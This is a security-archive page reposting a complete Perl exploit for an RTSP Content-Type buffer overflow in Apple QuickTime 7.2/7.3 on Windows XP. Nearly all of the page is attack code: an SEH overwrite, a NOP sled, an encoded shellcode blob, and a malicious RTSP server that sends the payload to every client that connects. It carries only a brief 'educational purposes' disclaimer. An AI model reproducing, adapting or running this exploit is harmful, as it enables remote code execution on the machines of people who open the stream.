首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Apple QuickTime 7.2/7.3 RTSP BOF (Perl)
来源:vfocus.net 作者:Jacky 发布时间:2010-01-07  
# Exploit Title: Apple QuickTime 7.2/7.3 RTSP BOF (Perl)
# Date: 2009-01-06
# Author: Jacky
# Software Link: [downoad link if available]
# Version: 7.2/7.3
# Tested on: Windows XP SP3
# CVE : [if exists]
# Code :
#Apple QuickTime 7.2/7.3 RTSP BOF (Perl Edition )
#Discovered by (Krystian Kloskowski (h07) <h07@interia.pl>)
#Written and coded by Jacky!
#All Greetz to Peter Van Eeckhoutte and Corelan Team ( Best exploitation team);-)
#This time i wrote the exploit in perl , because i saw that it was written
#many times in python and ruby only !
#This exploit is for EDUCATIONAL PURPOSES ONLY !!!
#!/usr/bin/perl -w
# (RTSP) Content-Type: [A * 995] + [B * 4096]\r\n
#
# 0x41414141 Pointer to next SEH record
# 0x42424242 SE handler
use strict;
use Socket;
my $junk="A"x991;
my $nseh="\xeb\x06\x90\x90";
my $seh="\x4e\x28\x86\x66"; #\x4e\x28\x86\x66
my $nops="\x90"x20;
my $shellcode="\x89\xe2\xdd\xc4\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4b\x4c\x48\x68\x4f\x79\x43\x30\x43\x30" .
"\x47\x70\x45\x30\x4b\x39\x4d\x35\x50\x31\x49\x42\x45\x34" .
"\x4e\x6b\x46\x32\x44\x70\x4c\x4b\x50\x52\x44\x4c\x4c\x4b" .
"\x42\x72\x45\x44\x4c\x4b\x50\x72\x51\x38\x44\x4f\x4f\x47" .
"\x50\x4a\x47\x56\x46\x51\x49\x6f\x45\x61\x4b\x70\x4c\x6c" .
"\x45\x6c\x43\x51\x51\x6c\x47\x72\x46\x4c\x47\x50\x4f\x31" .
"\x4a\x6f\x44\x4d\x46\x61\x49\x57\x4a\x42\x48\x70\x46\x32" .
"\x46\x37\x4e\x6b\x50\x52\x46\x70\x4c\x4b\x47\x32\x47\x4c" .
"\x45\x51\x4e\x30\x4e\x6b\x51\x50\x44\x38\x4b\x35\x4b\x70" .
"\x43\x44\x43\x7a\x46\x61\x4e\x30\x46\x30\x4e\x6b\x50\x48" .
"\x46\x78\x4c\x4b\x51\x48\x47\x50\x46\x61\x49\x43\x4b\x53" .
"\x47\x4c\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x46\x61\x48\x56" .
"\x50\x31\x49\x6f\x50\x31\x49\x50\x4e\x4c\x4f\x31\x48\x4f" .
"\x44\x4d\x47\x71\x48\x47\x46\x58\x4b\x50\x44\x35\x49\x64" .
"\x44\x43\x51\x6d\x4a\x58\x47\x4b\x43\x4d\x44\x64\x50\x75" .
"\x4a\x42\x50\x58\x4e\x6b\x42\x78\x47\x54\x46\x61\x4b\x63" .
"\x43\x56\x4e\x6b\x44\x4c\x42\x6b\x4c\x4b\x42\x78\x45\x4c" .
"\x45\x51\x49\x43\x4e\x6b\x44\x44\x4c\x4b\x47\x71\x4e\x30" .
"\x4c\x49\x43\x74\x44\x64\x44\x64\x43\x6b\x51\x4b\x51\x71" .
"\x43\x69\x43\x6a\x43\x61\x4b\x4f\x49\x70\x42\x78\x43\x6f" .
"\x42\x7a\x4e\x6b\x45\x42\x4a\x4b\x4f\x76\x51\x4d\x51\x7a" .
"\x45\x51\x4e\x6d\x4b\x35\x4d\x69\x43\x30\x47\x70\x47\x70" .
"\x50\x50\x45\x38\x45\x61\x4c\x4b\x42\x4f\x4e\x67\x4b\x4f" .
"\x49\x45\x4d\x6b\x49\x6e\x44\x4e\x44\x72\x4b\x5a\x45\x38" .
"\x4f\x56\x4f\x65\x4d\x6d\x4f\x6d\x49\x6f\x4a\x75\x45\x6c" .
"\x47\x76\x43\x4c\x46\x6a\x4d\x50\x49\x6b\x49\x70\x44\x35" .
"\x44\x45\x4f\x4b\x51\x57\x47\x63\x50\x72\x50\x6f\x42\x4a" .
"\x43\x30\x46\x33\x4b\x4f\x48\x55\x45\x33\x51\x71\x42\x4c" .
"\x42\x43\x44\x6e\x42\x45\x44\x38\x43\x55\x45\x50\x41\x41";
my $rest="B"x(4096-length($seh.$nops.$shellcode));
my $payload=$junk.$nseh.$seh.$nops.$shellcode.$rest;
my $header = "RTSP/1.0 200 OK\r\n".
"CSeq: 1\r\n".
"Date: 0x00 :P\r\n".
"Content-Base: rtsp://0.0.0.0/1.mp3/\r\n".
"Content-Type: $payload\r\n".
"Content-Length: 334\r\n".
"\r\n";
my $body = "v=0\r\n".
"o=- 16689332712 1 IN IP4 0.0.0.0\r\n".
"s=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n".
"i=1.mp3\r\n".
"t=0 0\r\n".
"a=tool:ciamciaramcia\r\n".
"a=type:broadcast\r\n".
"a=control:*\r\n".
"a=range:npt=0-213.077\r\n".
"a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n".
"a=x-qt-text-inf:1.mp3\r\n".
"m=audio 0 RTP/AVP 14\r\n".
"c=IN IP4 0.0.0.0\r\n".
"a=control:track1\r\n";
my $evil=$header.$body;
my $port=shift || 554;
my $proto=getprotobyname('tcp');
socket(SERVER,PF_INET,SOCK_STREAM,$proto);
my $paddr=sockaddr_in($port,INADDR_ANY);
bind(SERVER,$paddr);
listen(SERVER,SOMAXCONN);
print "[+]Listening on [RTSP]554\n";
my $client_addr;
while($client_addr=accept(CLIENT,SERVER))
{
print CLIENT $evil;
print "[+]Connection Accepted\n";
print "[+]Sending Evil Payload\n";
}
close CLIENT;
print "[+]Connection closed\n";
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
· Novell eDirectory 8.8 SP5 (Po
·DirectAdmin <= 1.33.6 Symlink
·flashget 3.x IEHelper remote e
·D-LINK DKVM-IP8 XSS Vulnerabil
·GOM Audio Local crash poc
·Microsoft HTML Help Compiler (
·PlayMeNow v7.3 and 7.4 Buffer
·Total Multimedia Features DoS
·Joomla Jembed component remote
·Gnome Panel <= 2.28.0 Denial o
·Microsoft SQL Server sp_replwr
·BigAnt Server 2.52 USV Buffer
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved